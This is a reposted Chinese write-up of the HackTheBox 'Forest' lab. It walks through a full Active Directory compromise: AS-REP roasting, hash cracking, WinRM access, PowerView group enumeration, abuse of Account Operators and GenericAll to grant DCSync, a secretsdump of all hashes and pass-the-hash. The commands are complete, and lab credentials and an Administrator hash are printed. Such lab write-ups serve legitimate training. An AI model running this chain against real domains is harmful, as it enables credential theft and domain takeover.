爆款云主机2核4G限时秒杀,88元/年起!
查看详情

活动

天翼云最新优惠活动,涵盖免费试用,产品折扣等,助您降本增效!
热门活动
  • 618智算钜惠季 爆款云主机2核4G限时秒杀,88元/年起!
  • 免费体验DeepSeek,上天翼云息壤 NEW 新老用户均可免费体验2500万Tokens,限时两周
  • 云上钜惠 HOT 爆款云主机全场特惠,更有万元锦鲤券等你来领!
  • 算力套餐 HOT 让算力触手可及
  • 天翼云脑AOne NEW 连接、保护、办公,All-in-One!
  • 中小企业应用上云专场 产品组合下单即享折上9折起,助力企业快速上云
  • 息壤高校钜惠活动 NEW 天翼云息壤杯高校AI大赛,数款产品享受线上订购超值特惠
  • 天翼云电脑专场 HOT 移动办公新选择,爆款4核8G畅享1年3.5折起,快来抢购!
  • 天翼云奖励推广计划 加入成为云推官,推荐新用户注册下单得现金奖励
免费活动
  • 免费试用中心 HOT 多款云产品免费试用,快来开启云上之旅
  • 天翼云用户体验官 NEW 您的洞察,重塑科技边界

智算服务

打造统一的产品能力,实现算网调度、训练推理、技术架构、资源管理一体化智算服务
智算云(DeepSeek专区)
科研助手
  • 算力商城
  • 应用商城
  • 开发机
  • 并行计算
算力互联调度平台
  • 应用市场
  • 算力市场
  • 算力调度推荐
一站式智算服务平台
  • 模型广场
  • 体验中心
  • 服务接入
智算一体机
  • 智算一体机
大模型
  • DeepSeek-R1-昇腾版(671B)
  • DeepSeek-R1-英伟达版(671B)
  • DeepSeek-V3-昇腾版(671B)
  • DeepSeek-R1-Distill-Llama-70B
  • DeepSeek-R1-Distill-Qwen-32B
  • Qwen2-72B-Instruct
  • StableDiffusion-V2.1
  • TeleChat-12B

应用商城

天翼云精选行业优秀合作伙伴及千余款商品,提供一站式云上应用服务
进入甄选商城进入云市场创新解决方案
办公协同
  • WPS云文档
  • 安全邮箱
  • EMM手机管家
  • 智能商业平台
财务管理
  • 工资条
  • 税务风控云
企业应用
  • 翼信息化运维服务
  • 翼视频云归档解决方案
工业能源
  • 智慧工厂_生产流程管理解决方案
  • 智慧工地
建站工具
  • SSL证书
  • 新域名服务
网络工具
  • 翼云加速
灾备迁移
  • 云管家2.0
  • 翼备份
资源管理
  • 全栈混合云敏捷版(软件)
  • 全栈混合云敏捷版(一体机)
行业应用
  • 翼电子教室
  • 翼智慧显示一体化解决方案

合作伙伴

天翼云携手合作伙伴,共创云上生态,合作共赢
天翼云生态合作中心
  • 天翼云生态合作中心
天翼云渠道合作伙伴
  • 天翼云代理渠道合作伙伴
天翼云服务合作伙伴
  • 天翼云集成商交付能力认证
天翼云应用合作伙伴
  • 天翼云云市场合作伙伴
  • 天翼云甄选商城合作伙伴
天翼云技术合作伙伴
  • 天翼云OpenAPI中心
  • 天翼云EasyCoding平台
天翼云培训认证
  • 天翼云学堂
  • 天翼云市场商学院
天翼云合作计划
  • 云汇计划
天翼云东升计划
  • 适配中心
  • 东升计划
  • 适配互认证

开发者

开发者相关功能入口汇聚
技术社区
  • 专栏文章
  • 互动问答
  • 技术视频
资源与工具
  • OpenAPI中心
开放能力
  • EasyCoding敏捷开发平台
培训与认证
  • 天翼云学堂
  • 天翼云认证
魔乐社区
  • 魔乐社区

支持与服务

为您提供全方位支持与服务,全流程技术保障,助您轻松上云,安全无忧
文档与工具
  • 文档中心
  • 新手上云
  • 自助服务
  • OpenAPI中心
定价
  • 价格计算器
  • 定价策略
基础服务
  • 售前咨询
  • 在线支持
  • 在线支持
  • 工单服务
  • 建议与反馈
  • 用户体验官
  • 服务保障
  • 客户公告
  • 会员中心
增值服务
  • 红心服务
  • 首保服务
  • 客户支持计划
  • 专家技术服务
  • 备案管家

了解天翼云

天翼云秉承央企使命,致力于成为数字经济主力军,投身科技强国伟大事业,为用户提供安全、普惠云服务
品牌介绍
  • 关于天翼云
  • 智算云
  • 天翼云4.0
  • 新闻资讯
  • 天翼云APP
基础设施
  • 全球基础设施
  • 信任中心
最佳实践
  • 精选案例
  • 超级探访
  • 云杂志
  • 分析师和白皮书
  • 天翼云·创新直播间
市场活动
  • 2025智能云生态大会
  • 2024智算云生态大会
  • 2023云生态大会
  • 2022云生态大会
  • 天翼云中国行
天翼云
  • 活动
  • 智算服务
  • 产品
  • 解决方案
  • 应用商城
  • 合作伙伴
  • 开发者
  • 支持与服务
  • 了解天翼云
      • 文档
      • 控制中心
      • 备案
      • 管理中心

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      首页 知识中心 服务器 文章详情页

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      2024-04-22 08:34:59 阅读次数:50

      服务器,运维

      扫描

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      枚举特定于域控制器的服务

      枚举将从尝试从DNS服务器获取区域传输开始。

      dig @10.10.10.161 AXFR htb.local

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      区域传输尝试不成功,因此接下来我将继续讨论kerberos服务。

      针对Kerberos服务,我在不提供用户名的情况下测试了快速的No-Preauth成功。

      GetNPUsers.py active.htb/ -dc-ip 10.10.10.100

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      轰!看起来一个长镜头是成功的,我能够揭示一个AS-REP可烤服务帐户:svc-alfresco

      通常使用AS-REP烘焙,您需要一个有效的用户名。当涉及到AD枚举时,有三个检查阶段:无凭证(匿名访问)、无密码的有效用户名,然后是有效凭证集(用户名+密码)。 

      AS-REP烘焙服务帐户svc-alfresco

      现在我可以请求用户的哈希并破解它!

      GetNPUsers.py htb.local/ -dc-ip 10.10.10.161 -request

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      太神奇了!服务帐户AS-REP哈希已转储!

      由于这不是一个标准的NTLM散列,我需要破解它,所以我完整地复制了它,并将其粘贴到一个名为hash.txt的文件中 。

      使用Hashcat破解AS-REP哈希 

      现在散列在文件中并准备破解,我首先使用 hashcat 找到此散列类型的破解模式,然后继续破解它。

      hashcat -h | grep -i "AS-REP"
      
      hashcat -m 18200 ./hash.txt /usr/share/wordlists/rockyou.txt -o cracked.txt

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      在短短的10秒钟内,密码被破解了。

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      检查输出文件,我恢复了svc-alfresco的密码。

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      svc-alfresco : s3rvice

      太好了!我能够在早期获得凭证,现在我可以使用到Kerberos、LDAP、SMB和WinRM等服务的经过身份验证的会话执行更深入的枚举

      作为svc-alfresco获得立足点

      首先,我检查了这些凭证是否有效,以及它们可以使用crackmapexec访问哪些服务

      crackmapexec smb 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      通过SMB进行测试,确认这些凭据有效;但是,我没有看到Pwn 3D!消息,指示可以通过此服务执行命令。

      接下来,我检查了WinRM访问,果然我得到了Pwn 3d!留言

      crackmapexec winrm 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      这意味着我将不再需要在外部枚举其他服务,因为我发现了一个快速的胜利,现在我可以使用evil-winrm获得立足点

      evil-winrm -i 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      攻击后的枚举和权限提升

      就像初始枚举一样,因为这是一个域控制器,所以开发后枚举将分为两个部分:域特定枚举和常规枚举。

      从特定于域的枚举开始,我使用以下命令获取了所有域用户的列表:

      net user /domain

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      列出了相当多的域用户,因此我复制了完整的列表并将其添加到名为user.txt的文件中,然后使用Linux-fu对其进行清理并将其放入名为users.txt的新文件中

      cat user.txt | tr ' ' '\n' | sed -r '/^\s*$/d' > users.txt

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      接下来,我检查了域管理员是谁。

      net groups "Domain Admins" /domain

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      唯一的DA是内置的域管理员帐户。

      现在我已经收集了一些关于域用户的信息,我想枚举这些组。

      net group /domain

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      这里有很多非默认组;但是,有一些比较突出,例如Exchange组、特权IT帐户、服务帐户和测试。

      另外,我想检查“本地组”,因为它们在加入域时成为“域本地组”,尤其是DC上的组。

      net localgroup 

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      上面我只强调了几个“域本地组”,你不会找到,比方说,一个非域加入Windows机器。

      查找指向“Account Operators”组的嵌套组

      不幸的是,如果其中任何一个是嵌套的组,我将无法使用net命令进行区分。即使我检查我的当前用户,它也只会显示该用户是其直接成员的组。

      net user svc-alfresco /domain

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      这里显示当前用户是ServiceAccounts组的一部分;但是,它们可以是嵌套了“服务帐户”组的多个组的成员。

      由于内置命令存在一些限制,我将使用PowerView.ps1深入研究组。

      使用PowerView.ps1枚举组 

      在获取PowerView.ps1的副本后,我将其移动到工作目录。回到目标上,我移动到C:\Windows\Temp文件夹来安装商店。

      evil-winrm的一个很好的特性是它有一个内置的上传功能,所以我利用它将PowerView.ps1上传到目标上,如下所示:

      upload /opt/hackthebox/Forest/PowerView.ps1

      接下来,我使用dot-sourcing将脚本导入到当前会话中。

      . .\PowerView.ps1

      导入后,我可以使用菜单命令检查与此脚本关联的所有可能函数。

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      加载PowerView后,首先要查找的是当前用户所属的所有组。

      Get-DomainGroup -MemberIdentity 'svc-alfresco' | select samaccountname

       HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      酷!这显示了当前用户是3个组的一部分,但我可以在这里看到“特权IT帐户”,这是我在使用net user命令时没有看到的。这意味着该组可能是嵌套的。

      接下来,我想深入每个组,找到与每个组关联的所有嵌套组。

      Get-DomainGroup 'Service Accounts' | select samaccountname,memberof

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      在这里我找到了第一个嵌套组。这表示“服务帐户”组中的所有用户也是“特权IT帐户”组的成员。

      现在我找到了这个嵌套的组,我想检查这个组是否也是嵌套的。

      Get-DomainGroup 'Privileged IT Accounts' | select samaccountname,memberof

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      更多的巢!这告诉我,“Privileged IT Accounts”组中的所有用户都是“Account Operators”组的一部分。

      Account Operators组实际上是一个域本地组。这就是为什么它没有显示在域组列表中的原因。

      由于帐户操作员是一个本地组,很可能我已经达到了终点。

      Get-DomainGroup 'Account Operators' | select samaccountname,memberof

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      这证实了它。此组不是任何其他组的成员。 

      svc-alfresco >> Service Accounts >> Privileged IT Accounts >> Account Operators

      这实际上是在同一个域中嵌套的最佳实践,应该是:用户/计算机>>全局组>>域本地组

      了解帐户操作员组

      由于我到达了嵌套路径的末尾,我决定在“帐户操作员”组上运行相同的命令,只是这次我不会选择特定的字段,以便我可以获得有关该组的一些信息。

      Get-DomainGroup 'Account Operators'

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      这很有趣,因为它表明我可以管理用户和组。 

      帐户操作员组向用户赠款有限的帐户创建权限。此组的成员可以创建和修改大多数类型的帐户,包括用户、本地组和全局组的帐户。组成员可以在本地登录到域控制器。

      帐户操作员组的成员不能管理管理员用户帐户、管理员的用户帐户或 管理员、 服务器操作员、 帐户操作员、 备份操作员或打印操作员组。此组的成员不能修改用户权限。

      根据上面的信息,看起来我应该能够创建一个用户并将其添加到一个组,只要它不是上面列出的组之一。

      寻找有价值的ACE

      • GenericAll – full rights to the object (add users to a group or reset user’s password)
        GenericAll -对象的完全权限(将用户添加到组或重置用户的密码)
      • GenericWrite – update object’s attributes (i.e logon script)
        GenericWrite -更新对象的属性(即登录脚本)
      • WriteOwner – change object owner to attacker controlled user take over the object
        WriteOwner -将对象所有者更改为攻击者控制的用户接管对象
      • WriteDACL – modify object’s ACEs and give attacker full control right over the object
        WriteDACL -修改对象的ACE并给予攻击者对对象的完全控制权
      • AllExtendedRights – ability to add user to a group or reset password
        AllExtendedRights -将用户添加到组或重置密码的能力
      • ForceChangePassword – ability to change user’s password
        ForceChangePassword -更改用户密码的能力
      • Self (Self-Membership) – ability to add yourself to a group
        Self(Self-Membership)-将自己添加到组的能力

      在这个列表中,最有趣的ACE是GenericAll,所以我们可以通过以下命令开始搜索具有此权限的所有组:

      $ADSI=[ADSI]"LDAP://DC=htb,DC=local"
      
      $ADSI.psbase.get_ObjectSecurity().getAccessRules($true, $true,[system.security.principal.NtAccount]) | Where-Object {$_.IdentityReference -like "*"} | Where-Object {$_.ActiveDirectoryRights -like "*GenericAll*"} | Where-Object {$_.AccessControlType -like "*Allow*"}
      

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      我对前两个结果不感兴趣,因为我不能修改任何管理员帐户(包括SYSTEM),也不能修改任何管理组。“组织管理”组是Exchange的管理组,这意味着“Exchange受信任的子系统”对我来说最突出。

      在Exchange受信任子系统组上滥用GenericAll权限

      由于我是帐户操作员组的一员,我应该能够创建一个帐户并将该帐户添加到“Exchange可信系统”组。由于这个组具有GenericAll权限,我应该能够将新创建的用户添加到这个组,然后给予他们All、ResetPassword、WriteMembers或DCSync权限

      net user /add pwnt P@ssw0rd /domain
      
      net group /add 'Exchange Trusted Subsystem' pwnt /domain

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      完美,现在我想尝试授予用户“DCSync”权利与以下: 

      $SecPassword = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force
      
      $Cred = New-Object System.Management.Automation.PSCredential('HTB.local\pwnt', $SecPassword)
      
      Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity pwnt -Rights DCSync

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      太好了!它看起来像这一切工作,因为我没有得到任何错误!

      DCSync攻击使用Microsoft Directory Replication Service Remote Protocol(MS-DRSR)中的命令伪装成域控制器(DC),以便从另一个DC获取用户凭据。

      使用DCSync攻击转储DC中的所有哈希

      现在是揭晓的时刻。如果一切按预期进行,我应该能够使用转储DC中的所有散列secretsdump.py,如下所示:

      secretsdump.py htb.local/pwnt:'P@ssw0rd'@10.10.10.161

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      轰!成功了!!现在我可以简单地使用管理员散列执行传递散列攻击并获得标志!

      最初我先在“组织管理”组上测试了与上面相同的步骤,看起来很有效...但是当我尝试使用secretsdump.py时,它不起作用。 

      evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6

      HTB-Forest(PowerView.ps1使用、嵌套组解析、了解帐户操作员组)

      版权声明:本文内容来自第三方投稿或授权转载,原文地址:https://mohen.blog.csdn.net/article/details/130916901,作者:墨痕诉清风,版权归原作者所有。本网站转在其作品的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如因作品内容、版权等问题需要同本网站联系,请发邮件至ctyunbbs@chinatelecom.cn沟通。

      上一篇:2021Kali系列 -- Kali安装与配置

      下一篇:从JVM底层原理分析数值交换那些事

      相关文章

      2025-05-19 09:05:01

      项目更新到公网服务器的操作步骤

      项目更新到公网服务器的操作步骤

      2025-05-19 09:05:01
      公网 , 数据库 , 文件 , 更新 , 服务器
      2025-05-19 09:04:44

      FinalShell 配置SSH密钥登陆

      FinalShell 配置SSH密钥登陆

      2025-05-19 09:04:44
      密钥 , 服务器 , 配置
      2025-05-14 10:33:16

      30天拿下Python之使用网络

      Python网络编程覆盖的范围非常广,包括:套接字编程、socketserver、HTTP和Web开发、异步编程和asyncio等。

      2025-05-14 10:33:16
      Json , TCP , 客户端 , 接字 , 服务器 , 示例 , 连接
      2025-05-14 09:51:21

      python 在创建socket之后建立心跳机制

      在Python中,建立心跳机制通常用于维持客户端和服务器之间的长连接,确保连接活跃性。心跳机制通常是通过定时发送心跳包(一种小型的、特定格式的数据包)来实现的,如果在预定时间内没有收到对方的心跳响应,则认为连接可能已经中断。

      2025-05-14 09:51:21
      发送 , 客户端 , 服务器 , 服务器端 , 示例
      2025-05-13 09:53:23

      在Java、Java Web中放置图片、视频、音频、图像文件的方法

      在Java软件中放置图片,通常涉及将图片文件(如JPEG、PNG等)作为资源包含在我们的项目中,并在代码中通过适当的方式引用这些资源。这可以通过多种方式实现,但最常见的是在Java桌面应用(如Swing或JavaFX)或Web应用(如Servlet/JSP)中。

      2025-05-13 09:53:23
      JSP , URL , Web , 图片 , 服务器
      2025-05-13 09:49:27

      shell基础_shell简介

      shell基础_shell简介

      2025-05-13 09:49:27
      shell , 学习 , 小结 , 简介 , 语言 , 运维
      2025-05-09 09:21:53

      WebAPI 和 webservice的区别

      WebAPI 和 webservice的区别

      2025-05-09 09:21:53
      HTTP , 协议 , 客户端 , 服务器 , 请求
      2025-05-09 08:51:09

      git学习(1)(简单概述、代码版本控制方式(集中/分布))

      git学习(1)(简单概述、代码版本控制方式(集中/分布))

      2025-05-09 08:51:09
      git , 一个 , 代码 , 共享 , 开发人员 , 服务器 , 版本
      2025-05-06 09:19:12

      redis高可用集群搭建

      redis高可用集群搭建

      2025-05-06 09:19:12
      master , redis , 服务器 , 节点 , 集群
      2025-05-06 09:19:00

      基于javaWeb+jsp人力资源管理系统(含文档)

      基于javaWeb+jsp人力资源管理系统(含文档)

      2025-05-06 09:19:00
      download , 数据库 , 文档 , 服务器 , 管理
      查看更多
      推荐标签

      作者介绍

      天翼云小翼
      天翼云用户

      文章

      33561

      阅读量

      5251845

      查看更多

      最新文章

      项目更新到公网服务器的操作步骤

      2025-05-19 09:05:01

      FinalShell 配置SSH密钥登陆

      2025-05-19 09:04:44

      redis高可用集群搭建

      2025-05-06 09:19:12

      基于javaWeb+jsp人力资源管理系统(含文档)

      2025-05-06 09:19:00

      【Linux 从基础到进阶】Apache服务器搭建与优化

      2025-05-06 09:18:38

      【Linux 从基础到进阶】Ansible自动化运维工具使用

      2025-05-06 08:30:38

      查看更多

      热门文章

      Linux运维小技巧---每日收集所有服务器信息并归档到指定服务器

      2023-03-16 07:49:58

      用ftp服务器进行yum源的设置

      2023-04-21 03:04:35

      Confluence 6 配置服务器基础地址

      2023-04-23 09:34:48

      linux中常见工具安装问题集锦

      2023-05-05 10:12:49

      linux环境日志排查,cat命令关键字查找、最近1000条、定位到指定位置

      2022-12-28 07:22:30

      在 ubuntu 中安装 Apache 2 Web 服务器

      2023-05-22 08:06:30

      查看更多

      热门标签

      服务器 linux 虚拟机 Linux 数据库 运维 网络 日志 数据恢复 java python 配置 nginx centos mysql
      查看更多

      相关产品

      弹性云主机

      随时自助获取、弹性伸缩的云服务器资源

      天翼云电脑(公众版)

      便捷、安全、高效的云电脑服务

      对象存储

      高品质、低成本的云上存储服务

      云硬盘

      为云上计算资源提供持久性块存储

      查看更多

      随机文章

      FinalShell 配置SSH密钥登陆

      Linux上的FTP服务器配置

      【服务器数据恢复】多次断电导致ProLiant服务器RAID模块损坏的数据恢复案例

      如何提高Docker容器的安全性

      为安装有系统及应用的服务器更换硬盘方法一例

      服务器数据恢复通用方法+服务器分区丢失恢复案例

      • 7*24小时售后
      • 无忧退款
      • 免费备案
      • 专家服务
      售前咨询热线
      400-810-9889转1
      关注天翼云
      • 旗舰店
      • 天翼云APP
      • 天翼云微信公众号
      服务与支持
      • 备案中心
      • 售前咨询
      • 智能客服
      • 自助服务
      • 工单管理
      • 客户公告
      • 涉诈举报
      账户管理
      • 管理中心
      • 订单管理
      • 余额管理
      • 发票管理
      • 充值汇款
      • 续费管理
      快速入口
      • 天翼云旗舰店
      • 文档中心
      • 最新活动
      • 免费试用
      • 信任中心
      • 天翼云学堂
      云网生态
      • 甄选商城
      • 渠道合作
      • 云市场合作
      了解天翼云
      • 关于天翼云
      • 天翼云APP
      • 服务案例
      • 新闻资讯
      • 联系我们
      热门产品
      • 云电脑
      • 弹性云主机
      • 云电脑政企版
      • 天翼云手机
      • 云数据库
      • 对象存储
      • 云硬盘
      • Web应用防火墙
      • 服务器安全卫士
      • CDN加速
      热门推荐
      • 云服务备份
      • 边缘安全加速平台
      • 全站加速
      • 安全加速
      • 云服务器
      • 云主机
      • 智能边缘云
      • 应用编排服务
      • 微服务引擎
      • 共享流量包
      更多推荐
      • web应用防火墙
      • 密钥管理
      • 等保咨询
      • 安全专区
      • 应用运维管理
      • 云日志服务
      • 文档数据库服务
      • 云搜索服务
      • 数据湖探索
      • 数据仓库服务
      友情链接
      • 中国电信集团
      • 189邮箱
      • 天翼企业云盘
      • 天翼云盘
      ©2025 天翼云科技有限公司版权所有 增值电信业务经营许可证A2.B1.B2-20090001
      公司地址:北京市东城区青龙胡同甲1号、3号2幢2层205-32室
      • 用户协议
      • 隐私政策
      • 个人信息保护
      • 法律声明
      备案 京公网安备11010802043424号 京ICP备 2021034386号